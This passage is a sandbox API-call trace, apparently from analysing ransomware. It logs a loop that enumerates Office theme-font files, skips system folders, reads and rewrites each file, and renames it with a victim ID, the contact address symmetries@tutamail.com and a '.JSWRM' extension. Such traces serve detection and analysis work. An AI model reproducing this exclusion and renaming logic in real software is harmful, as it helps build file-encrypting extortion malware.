lpMultiByteStr="Century Gothic.xml", lpUsedDefaultChar=0x0) returned 18 [0101.090] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0101.090] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0101.090] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Century Gothic.xml", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0101.090] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0101.090] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Century Gothic.xml", cchWideChar=18, lpMultiByteStr=0x2412b8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Century Gothic.xml", lpUsedDefaultChar=0x0) returned 18 [0101.090] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0101.090] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b9c0 [0101.090] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b908 | out: hHeap=0x1e0000) returned 1 [0101.090] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0101.090] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0101.090] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bf38 [0101.090] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Fonts\\Century Gothic.xml" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme fonts\\century gothic.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0101.091] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3543) returned 1 [0101.091] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.091] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xdd0) returned 0x206858 [0101.091] ReadFile (in: hFile=0x314, lpBuffer=0x206858, nNumberOfBytesToRead=0xdd0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x206858*, lpNumberOfBytesRead=0x345e89c*=0xdd0, lpOverlapped=0x0) returned 1 [0101.093] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.093] WriteFile (in: hFile=0x314, lpBuffer=0x206858*, nNumberOfBytesToWrite=0xdd0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x206858*, lpNumberOfBytesWritten=0x345e898*=0xdd0, lpOverlapped=0x0) returned 1 [0101.093] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x206858 | out: hHeap=0x1e0000) returned 1 [0101.093] CloseHandle (hObject=0x314) returned 1 [0101.093] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bda8 [0101.093] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0101.093] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0101.093] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0101.094] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0101.094] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0101.094] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0101.094] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0101.094] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0101.094] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0101.094] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24ba88 [0101.094] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f030 [0101.094] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24ba88 | out: hHeap=0x1e0000) returned 1 [0101.094] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0101.094] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Fonts\\Century Gothic.xml" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme fonts\\century gothic.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Fonts\\Century Gothic.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme fonts\\century gothic.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0101.094] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f030 | out: hHeap=0x1e0000) returned 1 [0101.095] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bda8 | out: hHeap=0x1e0000) returned 1 [0101.095] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bf38 | out: hHeap=0x1e0000) returned 1 [0101.095] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0101.095] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0101.095] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x11482f7f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x11482f7f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x114a91d5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xe1f, dwReserved0=0xfffffffe, dwReserved1=0x345ea88, cFileName="Century Schoolbook.xml", cAlternateFileName="CENTUR~1.XML")) returned 1 [0101.095] lstrcmpiW (lpString1="Century Schoolbook.xml", lpString2=".") returned 1 [0101.095] lstrcmpiW (lpString1="Century Schoolbook.xml", lpString2="..") returned 1 [0101.095] lstrcmpiW (lpString1="Century Schoolbook.xml", lpString2="...") returned 1 [0101.095] lstrcmpiW (lpString1="Century Schoolbook.xml", lpString2="windows") returned -1 [0101.095] lstrcmpiW (lpString1="Century Schoolbook.xml", lpString2="recovery") returned -1 [0101.095] lstrcmpiW (lpString1="Century Schoolbook.xml", lpString2="perflogs") returned -1 [0101.095] lstrcmpiW (lpString1="Century Schoolbook.xml", lpString2="documents and settings") returned -1 [0101.095] lstrcmpiW (lpString1="Century Schoolbook.xml", lpString2="$RECYCLE.BIN") returned 1 [0101.095] lstrcmpiW (lpString1="Century Schoolbook.xml", lpString2="system volume information") returned -1 [0101.095] lstrcmpiW (lpString1="Century Schoolbook.xml", lpString2="msocache") returned -1 [0101.095] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0101.095] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Century Schoolbook.xml", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0101.095] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0101.095] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Century Schoolbook.xml", cchWideChar=22, lpMultiByteStr=0x240fc0, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Century Schoolbook.xml", lpUsedDefaultChar=0x0) returned 22 [0101.095] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0101.095] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0101.095] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Century Schoolbook.xml", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0101.095] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0101.095] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Century Schoolbook.xml", cchWideChar=22, lpMultiByteStr=0x2411c8, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Century Schoolbook.xml", lpUsedDefaultChar=0x0) returned 22 [0101.095] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0101.095] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b8f8 [0101.095] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b9c0 | out: hHeap=0x1e0000) returned 1 [0101.095] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0101.095] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0101.095] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b1f0 [0101.095] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Fonts\\Century Schoolbook.xml" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme fonts\\century schoolbook.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0101.099] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3615) returned 1 [0101.099] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.099] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe10) returned 0x206858 [0101.099] ReadFile (in: hFile=0x314, lpBuffer=0x206858, nNumberOfBytesToRead=0xe10, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x206858*, lpNumberOfBytesRead=0x345e89c*=0xe10, lpOverlapped=0x0) returned 1 [0101.100] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.100] WriteFile (in: hFile=0x314, lpBuffer=0x206858*, nNumberOfBytesToWrite=0xe10, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x206858*, lpNumberOfBytesWritten=0x345e898*=0xe10, lpOverlapped=0x0) returned 1 [0101.100] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x206858 | out: hHeap=0x1e0000) returned 1 [0101.100] CloseHandle (hObject=0x314) returned 1 [0101.101] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bce0 [0101.101] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0101.101] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0101.101] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0101.101] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0101.101] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0101.101] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0101.101] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0101.101] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0101.101] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0101.101] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ea18 [0101.101] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x136) returned 0x23aa80 [0101.101] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ea18 | out: hHeap=0x1e0000) returned 1 [0101.101] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0101.101] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Fonts\\Century Schoolbook.xml" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme fonts\\century schoolbook.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Fonts\\Century Schoolbook.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme fonts\\century schoolbook.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0101.102] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23aa80 | out: hHeap=0x1e0000) returned 1 [0101.102] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bce0 | out: hHeap=0x1e0000) returned 1 [0101.102] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b1f0 | out: hHeap=0x1e0000) returned 1 [0101.102] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0101.102] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0101.102] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x114a91d5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x114a91d5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x114a91d5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xdda, dwReserved0=0xfffffffe, dwReserved1=0x345ea88, cFileName="Consolas-Verdana.xml", cAlternateFileName="CONSOL~1.XML")) returned 1 [0101.102] lstrcmpiW (lpString1="Consolas-Verdana.xml", lpString2=".") returned 1 [0101.102] lstrcmpiW (lpString1="Consolas-Verdana.xml", lpString2="..") returned 1 [0101.102] lstrcmpiW (lpString1="Consolas-Verdana.xml", lpString2="...") returned 1 [0101.102] lstrcmpiW (lpString1="Consolas-Verdana.xml", lpString2="windows") returned -1 [0101.102] lstrcmpiW (lpString1="Consolas-Verdana.xml", lpString2="recovery") returned -1 [0101.102] lstrcmpiW (lpString1="Consolas-Verdana.xml", lpString2="perflogs") returned -1 [0101.102] lstrcmpiW (lpString1="Consolas-Verdana.xml", lpString2="documents and settings") returned -1 [0101.102] lstrcmpiW (lpString1="Consolas-Verdana.xml", lpString2="$RECYCLE.BIN") returned 1 [0101.102] lstrcmpiW (lpString1="Consolas-Verdana.xml", lpString2="system volume information") returned -1 [0101.102] lstrcmpiW (lpString1="Consolas-Verdana.xml", lpString2="msocache") returned -1 [0101.102] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0101.102] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Consolas-Verdana.xml", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0101.102] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0101.102] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Consolas-Verdana.xml", cchWideChar=20, lpMultiByteStr=0x241010, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Consolas-Verdana.xml", lpUsedDefaultChar=0x0) returned 20 [0101.102] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0101.102] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0101.102] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Consolas-Verdana.xml", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0101.102] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f98 [0101.102] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Consolas-Verdana.xml", cchWideChar=20, lpMultiByteStr=0x240f98, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Consolas-Verdana.xml", lpUsedDefaultChar=0x0) returned 20 [0101.102] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0101.102] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bf38 [0101.102] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b8f8 | out: hHeap=0x1e0000) returned 1 [0101.102] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0101.102] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0101.102] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24c000 [0101.103] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Fonts\\Consolas-Verdana.xml" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme fonts\\consolas-verdana.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0101.103] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3546) returned 1 [0101.103] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.103] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xdd0) returned 0x206858 [0101.103] ReadFile (in: hFile=0x314, lpBuffer=0x206858, nNumberOfBytesToRead=0xdd0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x206858*, lpNumberOfBytesRead=0x345e89c*=0xdd0, lpOverlapped=0x0) returned 1 [0101.105] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.105] WriteFile (in: hFile=0x314, lpBuffer=0x206858*, nNumberOfBytesToWrite=0xdd0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x206858*, lpNumberOfBytesWritten=0x345e898*=0xdd0, lpOverlapped=0x0) returned 1 [0101.105] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x206858 | out: hHeap=0x1e0000) returned 1 [0101.105] CloseHandle (hObject=0x314) returned 1 [0101.105] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bc18 [0101.105] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0101.105] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0101.105] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0101.105] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0101.105] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0101.105] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0101.105] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0101.105] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0101.105] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0101.105] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b510 [0101.105] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f720 [0101.105] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b510 | out: hHeap=0x1e0000) returned 1 [0101.105] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0101.105] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Fonts\\Consolas-Verdana.xml" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme fonts\\consolas-verdana.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Fonts\\Consolas-Verdana.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme fonts\\consolas-verdana.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0101.106] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f720 | out: hHeap=0x1e0000) returned 1 [0101.106] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bc18 | out: hHeap=0x1e0000) returned 1 [0101.106] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c000 | out: hHeap=0x1e0000) returned 1 [0101.106] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f98 | out: hHeap=0x1e0000) returned 1 [0101.106] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0101.106] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x114a91d5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x114a91d5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x114a91d5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xdf6, dwReserved0=0xfffffffe, dwReserved1=0x345ea88, cFileName="Constantia-Franklin Gothic Book.xml", cAlternateFileName="CONSTA~1.XML")) returned 1 [0101.106] lstrcmpiW (lpString1="Constantia-Franklin Gothic Book.xml", lpString2=".") returned 1 [0101.106] lstrcmpiW (lpString1="Constantia-Franklin Gothic Book.xml", lpString2="..") returned 1 [0101.106] lstrcmpiW (lpString1="Constantia-Franklin Gothic Book.xml", lpString2="...") returned 1 [0101.106] lstrcmpiW (lpString1="Constantia-Franklin Gothic Book.xml", lpString2="windows") returned -1 [0101.106] lstrcmpiW (lpString1="Constantia-Franklin Gothic Book.xml", lpString2="recovery") returned -1 [0101.106] lstrcmpiW (lpString1="Constantia-Franklin Gothic Book.xml", lpString2="perflogs") returned -1 [0101.106] lstrcmpiW (lpString1="Constantia-Franklin Gothic Book.xml", lpString2="documents and settings") returned -1 [0101.106] lstrcmpiW (lpString1="Constantia-Franklin Gothic Book.xml", lpString2="$RECYCLE.BIN") returned 1 [0101.106] lstrcmpiW (lpString1="Constantia-Franklin Gothic Book.xml", lpString2="system volume information") returned -1 [0101.106] lstrcmpiW (lpString1="Constantia-Franklin Gothic Book.xml", lpString2="msocache") returned -1 [0101.106] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22be00 [0101.107] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Constantia-Franklin Gothic Book.xml", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0101.107] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0101.107] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Constantia-Franklin Gothic Book.xml", cchWideChar=35, lpMultiByteStr=0x22cdc8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Constantia-Franklin Gothic Book.xml", lpUsedDefaultChar=0x0) returned 35 [0101.107] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22be00 | out: hHeap=0x1e0000) returned 1 [0101.107] RtlAllocateHeap (HeapHandle=0x1e0000, 